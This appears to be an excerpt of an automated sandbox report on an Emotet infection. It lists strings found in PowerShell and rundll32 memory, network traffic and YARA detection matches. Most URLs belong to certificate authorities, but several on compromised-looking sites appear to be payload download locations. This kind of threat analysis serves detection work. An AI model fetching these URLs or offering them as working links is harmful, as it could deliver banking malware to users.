                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                      Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmpString found in binary or memory: http://nightlifemumbai.club
                      Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmpString found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0J
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0/
                      Source: powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
                      Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                      Source: powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2336945072.000000001D560000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmpString found in binary or memory: http://traumfrauen-ukraine.de
                      Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmpString found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
                      Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
                      Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
                      Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                      Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                      Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                      Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                      Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                      Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
                      Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
                      Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                      Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                      Source: powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                      Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                      Source: powershell.exe, 00000005.00000002.2334351202.000000001CF80000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                      Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
                      Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
                      Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                      Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                      Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                      Source: powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
                      Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                      Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                      Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                      Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                      Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
                      Source: powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
                      Source: powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                      Source: powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmpString found in binary or memory: http://www.globaltrust.info0
                      Source: powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmpString found in binary or memory: http://www.globaltrust.info0=
                      Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                      Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                      Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                      Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                      Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                      Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                      Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                      Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                      Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                      Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                      Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                      Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.1
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                      Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                      Source: rundll32.exe, 00000008.00000002.2334588090.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                      Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                      Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomstaging.com
                      Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
                      Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmpString found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                      Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev
                      Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
                      Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmpString found in binary or memory: https://traumfrauen-ukraine.de
                      Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmpString found in binary or memory: https://traumfrauen-ukraine.de/bin/JyeS/
                      Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                      Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                      Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                      Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                      Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.930000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.6b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.550000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.2f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.930000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.2010000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
